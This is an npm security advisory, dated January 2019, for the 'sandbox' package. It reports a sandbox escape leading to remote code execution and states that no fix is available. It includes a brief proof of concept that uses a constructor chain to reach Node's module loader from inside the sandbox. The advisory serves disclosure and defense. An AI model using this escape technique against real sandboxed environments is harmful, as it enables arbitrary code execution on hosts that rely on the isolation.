npm

Severity: moderate

Sandbox Breakout / Arbitrary Code Execution

sandbox

Overview

All versions of sandbox are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.

Proof of concept

var Sandbox = require("sandbox")
s = new Sandbox()
code = `new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")`
s.run(code)

Remediation

No fix is currently available. Consider using an alternative module until a fix is made available.

Resources

Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory Published
    Jan 14th, 2019
  2. reported

    Reported by Lucas Fiegl
    Jan 14th, 2019